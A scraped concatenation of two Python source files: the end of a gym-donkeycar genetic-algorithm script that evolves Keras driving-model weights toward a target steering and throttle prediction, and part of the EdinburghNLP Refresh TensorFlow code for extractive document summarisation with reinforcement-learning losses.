# hack, always select the best 2
# iP1 = 0
# iP2 = 1
# lets make sure parents are not the same
while iP2 == iP1:
iP2 = self.select_pop_index()
return self.population[iP1], self.population[iP2]
class NNAgent(IAgent):
def __init__(self, model, conf):
self.model = model
self.score = 0.0
self.conf = conf
def begin(self):
self.score = 0.0
def wait(self):
pass
def get_score(self):
return self.score
def mutate(self):
pass
def breed(self, agent1, agent2):
return agent1.model
def make_new(self, parent1, parent2):
new_model = self.breed(parent1, parent2)
agent = NNAgent(new_model, self.conf)
agent.mutate()
return agent
class KerasNNAgent(NNAgent):
def __init__(self, model, conf):
super().__init__(model, conf)
self.mutation_rate = conf["mutation_rate"]
def mutate(self):
layers_to_mutate = self.conf["layers_to_mutate"]
for iLayer in layers_to_mutate:
layer = self.model.get_layer(index=iLayer)
w = layer.get_weights()
self.modify_weights(w)
layer.set_weights(w)
self.decay_mutations()
def rand_float(self, mn, mx):
return float(np.random.uniform(mn, mx, 1)[0])
def modify_weights(self, w):
mx = self.conf["mutation_max"]
mn = self.conf["mutation_min"]
mag = self.rand_float(mn, mx)
for iArr, arr in enumerate(w):
val = self.rand_float(0.0, 1.0)
if val > self.mutation_rate:
continue
random_values = np.random.uniform(-mag, mag, arr.shape)
arr = arr + random_values
w[iArr] = arr
return w
def decay_mutations(self):
self.conf["mutation_max"] *= self.conf["mutation_decay"]
def breed(self, agent1, agent2):
model1, model2 = agent1.model, agent2.model
jsm = model1.to_json()
new_model = tf.keras.models.model_from_json(jsm)
new_model.set_weights(model1.get_weights())
iLayers = self.conf["layers_to_combine"]
for iLayer in iLayers:
layer1 = model1.get_layer(index=iLayer)
layer2 = model2.get_layer(index=iLayer)
final_layer = new_model.get_layer(index=iLayer)
self.merge_layers(final_layer, layer1, layer2)
return new_model
def merge_layers(self, dest_layer, src1_layer, src2_layer):
w1 = src1_layer.get_weights()
w2 = src2_layer.get_weights()
res = w1.copy()
if type(w1) is list:
half = round(len(w1) / 2)
res[half:-1] = w2[half:-1]
else:
l_indices = np.tril_indices_from(w2)
res[l_indices] = w2[l_indices]
dest_layer.set_weights(res)
class KerasNNImageAgent(KerasNNAgent):
"""
Given an image and a target prediction, make an agent that will
optimize for score of target.
"""
def __init__(self, model, conf):
super().__init__(model, conf)
self.image = conf["image"]
self.target = conf["target"]
def begin(self):
pred = self.model.predict(self.image)
self.score = np.sum(np.absolute(pred - self.target))
def make_new(self, parent1, parent2):
new_model = self.breed(parent1, parent2)
agent = KerasNNImageAgent(new_model, self.conf)
agent.mutate()
return agent
def test_image_agent(model_filename, record_filename, num_agents, num_iter):
with open(os.path.expanduser(record_filename), "r") as fp:
record = json.load(fp)
img_filename = os.path.join(os.path.dirname(record_filename), record["cam/image_array"])
img = Image.open(os.path.expanduser(img_filename))
img_arr = np.array(img)
# Our model was trained with this normalization scale on data.
one_byte_scale = 1.0 / 255.0
img_arr = img_arr.astype(np.float32) * one_byte_scale
img_arr = img_arr.reshape((1,) + img_arr.shape)
steering = record["user/angle"]
throttle = record["user/throttle"]
target = np.array([np.array([[steering]]), np.array([[throttle]])])
    # These are the final two dense layers we will mutate. We will use the same two layers when breeding.
to_mutate = [14, 16]
conf = {"layers_to_mutate": to_mutate}
conf["layers_to_combine"] = to_mutate
conf["mutation_rate"] = 1.0
conf["mutation_max"] = 0.3
conf["mutation_min"] = 0.0
conf["mutation_decay"] = 1.0
conf["image"] = img_arr
conf["target"] = target
population = []
for i in range(num_agents):
model = tf.keras.models.load_model(os.path.expanduser(model_filename))
agent = KerasNNImageAgent(model, conf)
if i > 0:
agent.mutate()
population.append(agent)
# Some initial state
print("target: steering: %f throttle: %f" % (target[0][0][0], target[1][0][0]))
agent = population[0]
agent.begin()
print("initial score:", agent.score)
pred = agent.model.predict(img_arr)
print("initial pred", pred[0][0], pred[1][0])
# Try to improve
alg = GeneticAlg(population)
alg.process(num_iter=num_iter)
# Our best agent
agent = alg.population[0]
print("final score:", agent.score)
pred = agent.model.predict(img_arr)
print("final pred", pred[0][0], pred[1][0])
if __name__ == "__main__":
# Example: python ~\projects\gym-donkeycar\examples\genetic_alg\simple_gen.py
# --model models\lane_keeper.h5 --record data\tub_6_20-05-16\record_2000.json
parser = argparse.ArgumentParser(description="simple_gen")
parser.add_argument("--model", type=str, help=".h5 model produced by donkeycar. expects the default linear model type.")
parser.add_argument("--record", type=str, help="donkey json record to use for training")
parser.add_argument("--num_agents", type=int, default=8, help="how many agents in our population")
parser.add_argument("--num_iter", type=int, default=8, help="how many generations before we stop")
args = parser.parse_args()
# only needed if TF==1.13.1
# config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# sess = tf.Session(config=config)
# K.set_session(sess)
test_image_agent(
model_filename=args.model, record_filename=args.record, num_agents=args.num_agents, num_iter=args.num_iter
)
|
model_docsum.py
|
EdinburghNLP/Refresh
| 265 |
64378
|
<gh_stars>100-1000
####################################
# Author: <NAME>
# Date: September 2016
# Project: Document Summarization
# H2020 Summa Project
####################################
"""
Document Summarization Modules and Models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import seq2seq
from tensorflow.python.ops import math_ops
# from tf.nn import variable_scope
from my_flags import FLAGS
from model_utils import *
### Various types of extractor
def sentence_extractor_nonseqrnn_noatt(sents_ext, encoder_state):
"""Implements Sentence Extractor: No attention and non-sequential RNN
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_rnn(sents_ext, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_nonseqrnn_titimgatt(sents_ext, encoder_state, titleimages):
"""Implements Sentence Extractor: Non-sequential RNN with attention over title-images
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
titleimages: Embeddings of title and images in the document
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_attentional_rnn(sents_ext, titleimages, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_seqrnn_docatt(sents_ext, encoder_outputs, encoder_state, sents_labels):
"""Implements Sentence Extractor: Sequential RNN with attention over sentences during encoding
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_outputs, encoder_state
sents_labels: Gold sent labels for training
Returns:
extractor output and logits
"""
# Define MLP Variables
weights = {
'h1': variable_on_cpu('weight_1', [2*FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'h2': variable_on_cpu('weight_2', [FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('weight_out', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
}
biases = {
'b1': variable_on_cpu('bias_1', [FLAGS.size], tf.random_normal_initializer()),
'b2': variable_on_cpu('bias_2', [FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('bias_out', [FLAGS.target_label_size], tf.random_normal_initializer())
}
# Shift sents_ext for RNN
with variable_scope.variable_scope("Shift-SentExt"):
    # Create embeddings for the special symbol (let's assume all 0) and put it in front by shifting by one
special_tensor = tf.zeros_like(sents_ext[0]) # tf.ones_like(sents_ext[0])
sents_ext_shifted = [special_tensor] + sents_ext[:-1]
# Reshape sents_labels for RNN (Only used for cross entropy training)
with variable_scope.variable_scope("Reshape-Label"):
# only used for training
sents_labels = reshape_tensor2list(sents_labels, FLAGS.max_doc_length, FLAGS.target_label_size)
# Define Sequential Decoder
extractor_outputs, logits = jporg_attentional_seqrnn_decoder(sents_ext_shifted, encoder_outputs, encoder_state, sents_labels, weights, biases)
# Final logits without softmax
with variable_scope.variable_scope("Reshape-Out"):
logits = reshape_list2tensor(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
extractor_outputs = reshape_list2tensor(extractor_outputs, FLAGS.max_doc_length, 2*FLAGS.size)
return extractor_outputs, logits
def policy_network(vocab_embed_variable, document_placeholder, label_placeholder):
"""Build the policy core network.
Args:
vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings without PAD and UNK
document_placeholder: [None,(FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.max_sent_length]
label_placeholder: Gold label [None, FLAGS.max_doc_length, FLAGS.target_label_size], only used during cross entropy training of JP's model.
Returns:
Outputs of sentence extractor and logits without softmax
"""
with tf.variable_scope('PolicyNetwork') as scope:
### Full Word embedding Lookup Variable
# PADDING embedding non-trainable
pad_embed_variable = variable_on_cpu("pad_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=False)
# UNK embedding trainable
unk_embed_variable = variable_on_cpu("unk_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=True)
# Get fullvocab_embed_variable
fullvocab_embed_variable = tf.concat(0, [pad_embed_variable, unk_embed_variable, vocab_embed_variable])
# print(fullvocab_embed_variable)
### Lookup layer
with tf.variable_scope('Lookup') as scope:
document_placeholder_flat = tf.reshape(document_placeholder, [-1])
document_word_embedding = tf.nn.embedding_lookup(fullvocab_embed_variable, document_placeholder_flat, name="Lookup")
document_word_embedding = tf.reshape(document_word_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.max_sent_length, FLAGS.wordembed_size])
# print(document_word_embedding)
### Convolution Layer
with tf.variable_scope('ConvLayer') as scope:
document_word_embedding = tf.reshape(document_word_embedding, [-1, FLAGS.max_sent_length, FLAGS.wordembed_size])
document_sent_embedding = conv1d_layer_sentence_representation(document_word_embedding) # [None, sentembed_size]
document_sent_embedding = tf.reshape(document_sent_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.sentembed_size])
# print(document_sent_embedding)
### Reshape Tensor to List [-1, (max_doc_length+max_title_length+max_image_length), sentembed_size] -> List of [-1, sentembed_size]
with variable_scope.variable_scope("ReshapeDoc_TensorToList"):
document_sent_embedding = reshape_tensor2list(document_sent_embedding, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size)
# print(document_sent_embedding)
# document_sents_enc
document_sents_enc = document_sent_embedding[:FLAGS.max_doc_length]
if FLAGS.doc_encoder_reverse:
document_sents_enc = document_sents_enc[::-1]
# document_sents_ext
document_sents_ext = document_sent_embedding[:FLAGS.max_doc_length]
# document_sents_titimg
document_sents_titimg = document_sent_embedding[FLAGS.max_doc_length:]
### Document Encoder
with tf.variable_scope('DocEnc') as scope:
encoder_outputs, encoder_state = simple_rnn(document_sents_enc)
### Sentence Label Extractor
with tf.variable_scope('SentExt') as scope:
if (FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Multiple decoder
print("Multiple decoder is not implement yet.")
exit(0)
# # Decoder to attend captions
# attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state)
# # Attend previous decoder
# logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder)
elif (not FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Attend only titimages during decoding
extractor_output, logits = sentence_extractor_nonseqrnn_titimgatt(document_sents_ext, encoder_state, document_sents_titimg)
elif (FLAGS.attend_encoder) and (len(document_sents_titimg) == 0):
# JP model: attend encoder
        extractor_output, logits = sentence_extractor_seqrnn_docatt(document_sents_ext, encoder_outputs, encoder_state, label_placeholder)
else:
# Attend nothing
extractor_output, logits = sentence_extractor_nonseqrnn_noatt(document_sents_ext, encoder_state)
# print(extractor_output)
# print(logits)
return extractor_output, logits
def baseline_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, last_size])
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length, 1]
future_rewards = tf.reshape(future_rewards, [-1, FLAGS.max_doc_length, 1])
future_rewards = tf.squeeze(future_rewards)
return future_rewards
def baseline_single_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards for whole document
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.max_doc_length*last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, FLAGS.max_doc_length*last_size]) # [FLAGS.batch_size, FLAGS.max_doc_length*(FLAGS.size or 2*FLAGS.size)]
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias # [FLAGS.batch_size, 1]
# future_rewards: [FLAGS.batch_size, 1]
future_rewards = tf.squeeze(future_rewards) # [FLAGS.batch_size]
return future_rewards
### Loss Functions
def mean_square_loss_doclevel(future_rewards, actual_reward):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size]
actual_reward: [FLAGS.batch_size]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size]
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def mean_square_loss(future_rewards, actual_reward, weights):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
actual_reward = tf.expand_dims(actual_reward, 1) # [FLAGS.batch_size, 1]
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size, FLAGS.max_doc_length]
mean_sq_loss = 0
if FLAGS.weighted_loss:
sq_loss = tf.mul(sq_loss, weights)
sq_loss_sum = tf.reduce_sum(sq_loss)
valid_sentences = tf.reduce_sum(weights)
mean_sq_loss = sq_loss_sum / valid_sentences
else:
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def cross_entropy_loss(logits, labels, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    labels: Sentence extraction gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('CrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights)
    # Cross entropy / document
cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
    # ## Cross entropy / sentence
# cross_entropy_sum = tf.reduce_sum(cross_entropy)
# valid_sentences = tf.reduce_sum(weights)
# cross_entropy_mean = cross_entropy_sum / valid_sentences
# cross_entropy = -tf.reduce_sum(labels * tf.log(logits), reduction_indices=1)
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
tf.add_to_collection('cross_entropy_loss', cross_entropy_mean)
# # # The total loss is defined as the cross entropy loss plus all of
# # # the weight decay terms (L2 loss).
# # return tf.add_n(tf.get_collection('losses'), name='total_loss')
return cross_entropy_mean
def predict_labels(logits):
""" Predict self labels
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
Return [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('PredictLabels') as scope:
# Reshape logits for argmax and argmin
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# Get labels predicted using these logits
logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
labels = tf.cast(labels, dtype)
return labels
def estimate_ltheta_ot(logits, labels, future_rewards, actual_rewards, weights):
"""
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    labels: Label placeholder for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
    actual_rewards: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
[FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('LTheta_Ot') as scope:
# Get Reward Weights: External reward - Predicted reward
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert (FLAGS.target_label_size = 2)
diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.nn.softmax(logits)
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Get the difference
diff_logits_indicator = logits - labels # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with reward
d_ltheta_ot = tf.mul(diff_act_pred, diff_logits_indicator) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with weight
weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
d_ltheta_ot = tf.mul(d_ltheta_ot, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
return d_ltheta_ot
# def estimate_ltheta_ot_mixer(logits, labels_gold, labels_pred, future_rewards, actual_rewards, weights, annealing_step):
# """
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_gold: Label placeholdr for gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_pred: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# annealing_step: [1], single value but in tensor form
# Returns:
# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('LTheta_Ot_Mixer') as scope:
# print(annealing_step)
# policygradloss_length = tf.reduce_sum(annealing_step) * FLAGS.annealing_step_delta
# crossentryloss_length = FLAGS.max_doc_length - policygradloss_length
# # Reshape logits and partition
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# logits = tf.nn.softmax(logits)
# logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# logits_list = reshape_tensor2list(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
# logits_ce_gold_list = logits_list[0:crossentryloss_length]
# logits_ce_gold = reshape_list2tensor(logits_ce_gold_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# logits_reward_list = logits_list[crossentryloss_length:]
# logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Crossentropy loss with gold labels: partition gold_labels
# labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_gold_used_list = labels_gold_list[0:crossentryloss_length]
# labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : cross entropy
# diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # Policy gradient for rest
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert (FLAGS.target_label_size = 2)
# diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get used reward diff
# diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:]
# diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Partition predicted labels
# labels_pred_list = reshape_tensor2list(labels_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_pred_used_list = labels_pred_list[crossentryloss_length:]
# labels_pred_used = reshape_list2tensor(labels_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : reward weighted
# diff_logits_predlabels = logits_reward - labels_pred_used # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Multiply with reward
# reward_weighted_diff_logits_predlabels = tf.mul(diff_reward_act_pred_used, diff_logits_predlabels) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Concat both part
# d_ltheta_ot_mixer = tf.concat(1, [diff_logits_goldlabels, reward_weighted_diff_logits_predlabels]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Multiply with weight
# weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot_mixer = tf.mul(d_ltheta_ot_mixer, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# return d_ltheta_ot_mixer
def reward_weighted_cross_entropy_loss_multisample(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    labels: Label placeholder for multiple sampled prediction [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
actual_rewards: [FLAGS.batch_size, 1]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RWCELossMultiSample') as scope:
# Expand logits and weights for roll outs
logits_temp = tf.expand_dims(logits, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
weights_temp = tf.expand_dims(weights, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
logits_expanded = logits_temp
weights_expanded = weights_temp
# for ridx in range(1,FLAGS.num_sample_rollout):
# logits_expanded = tf.concat(1, [logits_expanded, logits_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits_expanded = tf.reshape(logits_expanded, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits_expanded, labels) # [FLAGS.batch_size*1*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights_expanded) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.reshape(actual_rewards, [-1]) # [FLAGS.batch_size*1]
# [[a, b], [c, d], [e, f]] 3x2 => [a, b, c, d, e, f] [6]
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * 1 * FLAGS.max_doc_length]
# [a, b, c, d, e, f] * 2 = [a, b, c, d, e, f, a, b, c, d, e, f] [12]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size*1]
# [[a, b, c, d, e, f], [a, b, c, d, e, f]] [2, 6]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size*1, FLAGS.max_doc_length]
